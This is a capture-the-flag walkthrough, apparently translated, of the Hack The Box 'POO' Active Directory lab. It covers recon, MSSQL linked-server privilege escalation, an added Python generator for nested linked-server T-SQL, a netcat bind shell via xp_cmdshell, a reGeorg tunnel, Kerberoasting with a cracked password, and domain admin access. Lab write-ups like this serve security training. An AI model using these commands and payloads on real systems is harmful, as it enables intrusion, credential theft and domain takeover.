In this article we walk through not just a single machine, but a whole mini-lab from Hack The Box.
As the description states, POO is designed to test skills at every stage of an attack in a small Active Directory environment. The goal is to compromise the reachable host, escalate privileges and finally compromise the whole domain, collecting 5 flags along the way.
The lab is reached over VPN. You end up on a private network shared with people who know a thing or two about information security, so it is recommended not to connect from a work machine or from any host that holds important data :)
All information is provided for educational purposes only. The author of this document bears no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying it.
Intro
This endgame consists of 5 machines and contains 5 flags.
A description of the available hosts and their addresses is provided.
Let's begin!
Recon
The IP address of the entry machine is 10.13.38.11; add it to /etc/hosts:
10.13.38.11 poo.htb
The first step is to find the open ports. Scanning every port with nmap takes a long time, so start with masscan: all TCP and UDP ports through the tun0 interface at 500 packets per second.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now run nmap with the -A option against the ports found to get detailed information about the services behind them:
nmap -A poo.htb -p80,1433
So we have IIS and MSSQL. Along the way we learn the real DNS names of the domain and of the computer. The web server shows the default IIS page.
Let's brute-force directories with gobuster. Parameters: number of threads (-t 128), the URL (-u), the wordlist (-w) and the extensions of interest (-x):
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
So there is HTTP authentication on the /admin directory, and a .DS_Store file is exposed. .DS_Store is a macOS Finder file that stores per-folder settings: the list of files, icon positions, the chosen background image and so on. Such a file ends up in a web server directory when a developer copies a folder from a Mac, and it leaks the names of the files and subdirectories that were there. A .DS_Store crawler can recover that listing:
python3 dsstore_crawler.py -i http://poo.htb/
We get the directory listing. The most interesting entry is /dev, where we see source and db files for the site's development branches. The listing alone does not give every file name, but if the server is vulnerable to IIS short-name (8.3) enumeration, we can recover the first 6 characters of file and directory names. This can be checked with an IIS short-name scanner.
It reports a text file whose name starts with "poo_co". Not knowing what to do next, I selected every word beginning with "co" from the directory wordlist:
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And iterate over them with wfuzz, hiding 404 responses:
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find the right word! We read the file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).
Hand in the flag and advance to 20%.
Huh Flag
Connect to MSSQL with DBeaver.
There is nothing interesting in this database itself, so open an SQL editor and check which logins exist on the server:
SELECT name FROM master..syslogins;
We see the existing logins. Let's check which server roles our own login holds:
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So we have no privileges. Let's look at linked servers; I have written about this technique in detail before.
SELECT * FROM master..sysservers;
And here we find another SQL Server. Let's check that we can run queries on it with openquery():
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Moreover, the calls can be nested, building a chain of queries through several links (note how the single quotes double at every hop):
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
The point is that a query sent to a linked server runs in the security context of the login the link was configured with, not in ours. Let's see which user context we get on the linked server:
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Now let's see in which context a query from the linked server back to our own server runs:
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
So that is the dbo context, which should carry full privileges. Let's check the server roles held when the query comes back through the linked server:
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, on that path we have every privilege. So let's create an administrator for ourselves. openquery() cannot do this, since it is meant for pass-through queries that return a result set, so we use EXECUTE ... AT instead (this requires the RPC Out option to be enabled on the link, which it evidently was here):
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
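Writing these chains by hand is error-prone because every hop doubles the single quotes of everything inside it. The following helper, an added example and not code from the original article, builds the nested openquery() and EXECUTE ... AT statements for an arbitrary path of linked servers and produces a role check for every hop. It only generates T-SQL text; run the output from your own client (the article uses DBeaver and impacket's mssqlclient.py). The server names are the ones found above; everything else is an assumption of the example.

```python
"""Builds nested openquery() / EXECUTE ... AT statements for a chain of MSSQL linked servers.

Added example, not code from the original article. It only produces T-SQL
text. Each hop wraps the inner statement in a T-SQL string literal, which
doubles every single quote inside it; that is where the two- and four-quote
runs in hand-written chains come from.
"""


def quote_literal(sql: str) -> str:
    """Make sql a T-SQL string literal: wrap in ' and double every inner '."""
    return "'" + sql.replace("'", "''") + "'"


def openquery_chain(path, inner_sql):
    """Wrap inner_sql in one openquery() per linked server in path.

    path runs from the server we are connected to outward, e.g.
    ["COMPATIBILITYPOO_CONFIG", "COMPATIBILITYPOO_PUBLIC"] means: ask CONFIG to
    ask PUBLIC to run inner_sql. openquery() only accepts statements that
    return rows, so use it for reconnaissance, not for DDL.
    """
    sql = inner_sql
    for server in reversed(path):
        sql = f'SELECT * FROM openquery("{server}", {quote_literal(sql)})'
    return sql


def execute_at_chain(path, stmt):
    """Wrap stmt in one EXECUTE(...) AT per hop, for DDL such as CREATE LOGIN.

    EXECUTE ... AT is only accepted when the link has the 'RPC Out' option
    enabled; openquery() does not need it.
    """
    sql = stmt
    for server in reversed(path):
        sql = f'EXECUTE({quote_literal(sql)}) AT "{server}"'
    return sql


# Who are we, and which server roles do we hold, at a given hop?
ROLE_CHECK = (
    "SELECT @@servername AS srv, user_name() AS ctx_user, "
    "is_srvrolemember('sysadmin') AS sysadmin, "
    "is_srvrolemember('securityadmin') AS securityadmin"
)


def recon_queries(path):
    """ROLE_CHECK at every hop: index 0 is the local server, index i goes i links deep."""
    return [openquery_chain(path[:i], ROLE_CHECK) for i in range(len(path) + 1)]


if __name__ == "__main__":
    # The loop the article found: our server -> CONFIG -> back to PUBLIC as dbo.
    chain = ["COMPATIBILITYPOO_CONFIG", "COMPATIBILITYPOO_PUBLIC"]
    for q in recon_queries(chain):
        print(q + ";")
    print(execute_at_chain(chain, "ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]") + ";")
```

Run the role check for every hop before touching anything: the hop where sysadmin flips to 1 is the one to send the EXECUTE ... AT statements through, and on a real engagement that new login is a persistence artefact to record and remove.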
Now connect with the new login's credentials and find the new flag database.
Hand in this flag and move on.
BackTrack Flag
Let's get a shell through MSSQL. I use mssqlclient from the impacket package, with the ralf login created above:
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
Now we need a password for the web part. The first thing we met was the site, so we want the web server's configuration (dropping a convenient shell on the box is not possible; apparently a firewall is in the way).
But reading it through xp_cmdshell is denied: the SQL Server service account cannot read the file. All we need, though, is to know which external scripting languages are configured, and we find Python in the MSSQL directory (Machine Learning Services). External scripts run under their own worker account rather than the SQL Server service account, so reading web.config that way poses no problem:
EXEC sp_execute_external_script
    @language = N'Python',
    @script = "print(open('C:\\inetpub\\wwwroot\\web.config').read())"
Having found the credentials, we go to /admin and take the flag.
Foothold Flag
The firewall is indeed a nuisance, but looking at the network configuration we notice that IPv6 is in use.
Add the host's IPv6 address to /etc/hosts:
dead:babe::1001 poo6.htb
Scan the host again, this time over IPv6.
And over IPv6 the WinRM service is reachable. Let's connect with the credentials we found.
The flag is on the desktop; hand it in.
P00ned Flag
After some reconnaissance on the host, let's run the following command through MSSQL (xp_cmdshell) to list the service principal names registered in the domain:
setspn.exe -T intranet.poo -Q */*
This gives us SPNs registered on the user accounts p00_hr and p00_adm. Any domain user can request a service ticket for those SPNs, and the ticket is encrypted with a key derived from the account's password, so these accounts can be Kerberoasted: we obtain the tickets and crack the passwords offline.
But first we need a stable shell as the MSSQL user. Access is restricted: the host accepts connections only on ports 80 and 1433. Traffic can still be tunneled through port 80, though; for this we use reGeorg and upload its tunnel.aspx to the web root.
But accessing it returns a 404, meaning *.aspx files are not being executed. To get files with this extension executed, install ASP.NET 4.5 on the server (a persistent change to the target, which a real engagement should record):
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Now a request to tunnel.aspx gets the reply that everything is ready.
Start the client side of reGeorg, which relays the traffic: everything sent to local port 5432 is forwarded through the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
We also use proxychains to send application traffic through this proxy; add the SOCKS proxy listening on port 5432 to the /etc/proxychains.conf configuration file.
Now let's upload our tools (nc64.exe and Invoke-Kerberoast.ps1) to C:\temp on the server.
Now start a listener through MSSQL:
xp_cmdshell 'C:\temp\nc64.exe -e powershell.exe -lvp 4321'
And connect to it through the proxy (port 4321 is only reachable via the tunnel):
proxychains rlwrap nc poo.htb 4321
And collect the hashes:
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Now these hashes need to be cracked. Since rockyou did not contain the passwords, I used all the password wordlists shipped in SecLists. For cracking I used hashcat:
hashcat -a 0 -m 13100 kerb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And both passwords are found: the first was in dutch_passwordlist.txt, the second in Keyboard-Combinations.txt.
We now have two users, so we move towards the domain controller. First let's find its address.
We know the domain controller's IP address. Let's find out all the users of the domain and which of them are administrators. For this we download the PowerView.ps1 script, then connect with evil-winrm, giving the directory with the script in the -s parameter, and simply load PowerView.
Now we have access to all its functions. The p00_adm user looks like a privileged account, so we will work in its context. Create a PSCredential object for it:
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now every PowerShell command given -Credential $Creds will run on behalf of p00_adm. Let's display the list of users together with their AdminCount attribute:
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
So our user really is privileged. Let's see which groups he is a member of:
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Finally we confirm that the user is a domain administrator, which gives the right to log on to the domain controller remotely. Let's try to log in over WinRM through the tunnel. When I used evil-winrm I was confused by the errors reGeorg produced.
So we use another, simpler way.
We try to connect, and we are on the system.
That is nothing to worry about. Next we look at the users and check the desktop.
We find the flag on mr3ks, and the lab is 100% complete.
That's all. As feedback, please comment on whether you learned anything new from this article and whether it was useful.
Source: habr.com